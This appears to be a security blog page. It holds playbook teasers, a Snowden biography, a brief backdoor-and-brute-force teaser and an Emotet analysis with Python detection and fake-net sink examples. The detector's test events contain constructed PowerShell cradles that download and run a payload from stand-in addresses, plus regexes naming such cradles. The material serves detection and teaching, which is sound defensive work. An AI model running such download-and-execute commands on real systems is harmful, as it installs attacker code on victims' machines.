RansomWare PlayBook

Physical Host Containment: disconnect devices identified as infected from the network. You may need to ask the on-site contact to pull the network cable or disable the Wi-Fi radio. If it cannot be determined if the...

Phishing PlayBook

To determine whether the attempt was unsuccessful, check whether any credentials were provided (email logs, user interview) or any URLs were accessed (firewall logs, web gateway logs, user interview). Containment: ensure phishing emails are no longer...

DDOS PlayBook

If you are getting too much unwanted traffic from certain IPs, a handy tool is the IP-blocking feature of the .htaccess file. This file...

Evading Firewalls and Compromising a Windows Machine

DarkTrace Enterprise Immune System

Darktrace's Enterprise Immune System uses proprietary machine learning and AI algorithms to build a so-called "pattern of life" for every network, device, and user within...

Snowden

Edward Joseph Snowden (born June 21, 1983) is an American whistleblower who copied and leaked highly classified information from the National Security Agency (NSA) in 2013 when he was a Central Intelligence Agency (CIA) employee and subcontractor. His disclosures revealed numerous global surveillance programs, many run by the NSA and the Five Eyes Intelligence Alliance with the cooperation of telecommunication companies and European governments, and prompted a cultural discussion about national security and individual privacy.

In 2013, Snowden was hired by an NSA contractor, Booz Allen Hamilton, after previous employment with Dell and the CIA. Snowden says he gradually became disillusioned with the programs with which he was involved and that he tried to raise his ethical concerns through internal channels but was ignored. On May 20, 2013, Snowden flew to Hong Kong after leaving his job at an NSA facility in Hawaii, and in early June he revealed thousands of classified NSA documents to journalists Glenn Greenwald, Laura Poitras, and Ewen MacAskill. Snowden came to international attention after stories based on the material appeared in The Guardian and The Washington Post. Further disclosures were made by other publications including Der Spiegel and The New York Times.

On Snowden’s 30th birthday, June 21, 2013, the U.S. Department of Justice unsealed charges against Snowden of two counts of violating the Espionage Act of 1917 and theft of government property, following which the Department of State revoked his passport. Two days later, he flew into Moscow’s Sheremetyevo Airport, where Russian authorities noted that his U.S. passport had been cancelled, and he was restricted to the airport terminal for over one month. Russia later granted Snowden the right of asylum with an initial visa for residence for one year, and repeated extensions have permitted him to stay at least until 2020. In early 2016, he became the president of the Freedom of the Press Foundation, a San Francisco-based organization that states its purpose is to protect journalists from hacking and government surveillance. As of 2017 he is married and living in Moscow.

On September 17, 2019, his memoir Permanent Record was published. On the first day of publication, the U.S. Department of Justice filed a civil lawsuit against Snowden over publication of his memoir, alleging he had breached nondisclosure agreements signed with the U.S. federal government. Former The Guardian national security reporter Ewen MacAskill called the civil lawsuit a “huge mistake”, noting that the “UK ban of Spycatcher 30 years ago created huge demand”. The memoir was listed as no. 1 on Amazon’s bestseller list that same day. In an interview with Amy Goodman on Democracy Now! on 26 September 2019, Snowden clarified he considers himself a “whistleblower” as opposed to a “leaker” as he considers “a leaker only distributes information for personal gain”.


DarkWeb

What is the dark web? The internet has three main parts to...


Create a Backdoor!

You will need to brute-force SSH or FTP. Preferably SSH for high...

WP Scan Tutorial!

Emotet Malware Analysis

A video recorded in the ANY.RUN malware hunting service shows the execution of Emotet, allowing the behavior of this malware to be examined in detail.

Figure 1: The process list generated by the ANY.RUN malware hunting service

Figure 2: Further detail on Emotet's execution in the customizable text reports generated by ANY.RUN

Emotet execution process

Since Emotet is distributed primarily through malicious spam campaigns, the first step in the infection chain is social engineering: the victim is tricked into opening an attached Microsoft Office document. Once the file is opened and macros are enabled, no further user action is needed. The attached document carries malicious VBA code that runs as soon as macros are allowed. In one observed variant, the VBA code uses WMI to launch a PowerShell script that downloads the payload, a malicious executable, from a web server; notably, the PowerShell command line is encoded. Emotet then takes steps to persist on the infected system: it copies itself into %AppData% subfolders and adds an autorun value in the registry. Throughout the infection process the malware exchanges data with a server, and as its last execution step it waits for commands from its C2 servers.
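
To make the detection point concrete, here is an added example (not ANY.RUN's tooling and not Emotet's own code) in Python that scans constructed Sysmon-style process-creation events for the chain just described: PowerShell launched from WmiPrvSE.exe or an Office process, an -EncodedCommand operand, and a download cradle in the decoded script, with the payload URLs pulled out as IOCs. Because a macro's Win32_Process.Create call is carried out by the WMI provider host, the PowerShell process's parent is WmiPrvSE.exe rather than WINWORD.EXE, which is why a rule that only looks for Office-spawned PowerShell misses this variant. The process names, paths, stage-2 script and TEST-NET addresses are all constructed assumptions for the example.

```python
"""Flag the macro -> WMI -> encoded PowerShell -> download chain in process
telemetry. Added example, not ANY.RUN's tooling; events are constructed
Sysmon-style records and all addresses are TEST-NET ranges."""
import base64
import re

# -e, -ec, -enc, -encodedcommand: PowerShell accepts any unambiguous prefix.
# Requiring a >=16-char operand stops "-ExecutionPolicy Bypass" from matching.
ENCODED_ARG_RE = re.compile(r"-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.I)
CRADLE_RE = re.compile(
    r"DownloadFile|DownloadString|DownloadData|Invoke-WebRequest|\biwr\b|"
    r"Net\.WebClient|Start-BitsTransfer|Invoke-Expression|\biex\b", re.I)
URL_RE = re.compile(r"https?://[^\s'\"`;)]+", re.I)
# A macro's Win32_Process.Create call is carried out by the WMI provider host,
# so the child's parent is WmiPrvSE.exe, not the Office application.
SUSPICIOUS_PARENTS = {"wmiprvse.exe", "winword.exe", "excel.exe", "powerpnt.exe"}


def encode_ps(script):
    """What -EncodedCommand expects: base64 over UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Decoded script if the command line carries -enc <base64>, else None."""
    m = ENCODED_ARG_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def analyse(event):
    """Score one process-creation event; return a finding dict or None."""
    if event["image"].rsplit("\\", 1)[-1].lower() not in ("powershell.exe", "pwsh.exe"):
        return None
    parent = event["parent_image"].rsplit("\\", 1)[-1].lower()
    indicators = []
    if parent in SUSPICIOUS_PARENTS:
        indicators.append(f"parent {parent}")
    decoded = decode_encoded_command(event["cmdline"])
    if decoded is not None:
        indicators.append("encoded command")
    script = decoded if decoded is not None else event["cmdline"]
    if CRADLE_RE.search(script):
        indicators.append("download cradle")
    # Each indicator alone is noisy (admins use -enc; SCCM launches via WMI),
    # so require two before raising.
    if len(indicators) < 2:
        return None
    return {"pid": event["pid"], "indicators": indicators,
            "decoded": decoded, "urls": URL_RE.findall(script)}


def detect(events):
    return [f for f in map(analyse, events) if f is not None]


# Constructed stage-2 script the macro hands to WMI (stand-in, not a real sample).
STAGE2 = ("$wc = New-Object Net.WebClient; "
          "$u = 'http://203.0.113.45/wp-content/8k3f/'; "
          "$out = $env:TEMP + '\\123.exe'; "
          "$wc.DownloadFile($u, $out); Start-Process $out")
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

EVENTS = [  # constructed, shaped like Sysmon Event ID 1
    {"pid": 4120, "image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "parent_image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding"},
    {"pid": 5012, "image": PS,  # WMI variant from the text: parent is WmiPrvSE
     "parent_image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "cmdline": "powershell -nop -w hidden -enc " + encode_ps(STAGE2)},
    {"pid": 5340, "image": PS,  # classic variant: Word spawns PowerShell directly
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": "powershell -w hidden -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://198.51.100.7/docs/')\""},
    {"pid": 6100, "image": PS,  # benign admin script: must not fire
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r"powershell -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
]

if __name__ == "__main__":
    for hit in detect(EVENTS):
        print(hit["pid"], hit["indicators"], hit["urls"])
```

Run against real telemetry, the same three checks apply to Sysmon Event ID 1 or Windows Security 4688 records (with command-line auditing enabled); the two-indicator threshold is what keeps ordinary administrative use of -EncodedCommand from paging anyone.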

Prevention of Emotet attacks

To minimize the risk of Emotet infection, and the damage if an infection does occur, users are advised to follow standard best practices such as not opening attachments from suspicious emails and keeping antivirus software up to date at all times.

For organizations, it is advised to restrict inbound SMB communication between client systems, so that Emotet cannot spread from one machine to another within the local network; to provide security training and make employees aware of the danger of mail spam; and to take every possible precaution to filter out potentially malicious emails at the mail gateway and perimeter.

How does Emotet spread?

The main distribution method of Emotet is malicious email campaigns. The trojan uses its address-book-stealer module to pull contacts from the victim's email account and sends itself to those contacts from the hijacked account.

Because potential victims receive an email from someone they know and trust, Emotet has a very high chance of a successful attack. The email usually contains a link to a malicious URL that downloads the malware when clicked. Email spam is not the only distribution method this malware uses, however: it may also take advantage of certain Windows vulnerabilities, making its way onto a machine completely silently, without the user ever knowing about it.

How to collect Emotet’s IOCs using ANY.RUN?

For detailed Emotet analysis, ANY.RUN's "Fake Net" feature is very useful. It intercepts the sample's HTTP requests and answers each with an HTTP 404 error, which forces the malware to work through its list of C2 servers and so reveal their addresses.

To turn it on, open the "Advanced mode" of the "New task" window and check the "Fake net" box in the "Network" section.

Figure 3: Running an Emotet sample with the "Fake net" feature turned on
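
The mechanism is simple enough to reproduce locally. The following added example (not ANY.RUN's code) implements the same idea in Python: an HTTP sink that answers every request with 404 while recording the method, Host header and path, plus a constructed stand-in bot that walks a hard-coded C2 list and moves to the next entry on any non-2xx answer. Because nothing ever answers 200, the bot exhausts its whole list and the sink ends up holding every C2 URL. The bot, its C2 list (TEST-NET addresses) and the check-in format are assumptions made for the example; in a real sandbox the redirection to the sink is done at the network layer rather than by pointing the client at 127.0.0.1.

```python
"""Fake-net sink: answer every HTTP request with 404 and log what was asked for.

Added example, not ANY.RUN code. The 'bot' is a constructed stand-in for a
sample walking a hard-coded C2 list; all addresses are TEST-NET ranges."""
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer


class FakeNetHandler(BaseHTTPRequestHandler):
    """Swallows GET/POST, records (method, Host header, path), answers 404."""

    captured = []  # shared across requests; cleared by run_demo()

    def _sink(self):
        # Drain the body so the client never sees a reset mid-upload.
        length = int(self.headers.get("Content-Length") or 0)
        if length:
            self.rfile.read(length)
        FakeNetHandler.captured.append(
            (self.command, self.headers.get("Host", ""), self.path))
        self.send_response(404)
        self.send_header("Content-Length", "0")
        self.end_headers()

    do_GET = _sink
    do_POST = _sink

    def log_message(self, fmt, *args):  # silence the default stderr log
        return


# Constructed C2 list of the pretend bot: host:port as it would sit in the
# sample's config, and the URI it would POST its check-in to.
BOT_C2_LIST = [
    ("203.0.113.10:8080", "/whoami/"),
    ("198.51.100.23:443", "/window/merge/"),
    ("192.0.2.77:7080", "/usbccid/"),
]


def bot_checkin(sink_port, c2_list=BOT_C2_LIST):
    """Walk the C2 list the way a bot does: stop at the first 2xx, otherwise
    move on. Traffic is pointed at the local sink with the Host header set to
    the real C2, so the sink sees the request line and host the malware
    would have sent."""
    statuses = []
    for host, path in c2_list:
        req = urllib.request.Request(
            f"http://127.0.0.1:{sink_port}{path}",
            data=b"\x00" * 16,  # opaque check-in blob
            headers={"Host": host, "User-Agent": "Mozilla/4.0"})
        try:
            with urllib.request.urlopen(req, timeout=5) as resp:
                statuses.append(resp.status)
                break  # a live C2 answered; the bot stops looking
        except urllib.error.HTTPError as err:
            statuses.append(err.code)  # 404 from the sink: try the next one
    return statuses


def run_demo():
    """Start the sink, let the pretend bot exhaust its list, return the IOCs."""
    server = ThreadingHTTPServer(("127.0.0.1", 0), FakeNetHandler)
    port = server.server_address[1]
    threading.Thread(target=server.serve_forever, daemon=True).start()
    FakeNetHandler.captured.clear()
    try:
        statuses = bot_checkin(port)
    finally:
        server.shutdown()
        server.server_close()
    iocs = [f"http://{host}{path}" for _, host, path in FakeNetHandler.captured]
    return statuses, iocs


if __name__ == "__main__":
    statuses, iocs = run_demo()
    print("responses:", statuses)
    for url in iocs:
        print("C2 candidate:", url)
```

The point to take from the run is the order of events: the bot only gives up on an address after it has fully sent its check-in, so the sink records each C2 before the next is tried, and the captured list is exactly the set of addresses worth blocking.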

Emotet is one of the most sophisticated and destructive trojans currently active. Since it first appeared in 2014, the malware has undergone substantial evolution, gaining many evasion and anti-analysis features, acquiring worm-like functionality, and even shifting its main focus from information stealing to installing other trojans on infected machines. Thanks to its ability to spread to adjacent systems, Emotet can easily infect every machine on a network, making the consequences of an attack a true nightmare to deal with. The situation is made worse by the series of anti-analysis tricks the malware carries, which make analyzing it quite difficult. As a result, developing countermeasures is much more complicated than for simpler, more straightforward trojans.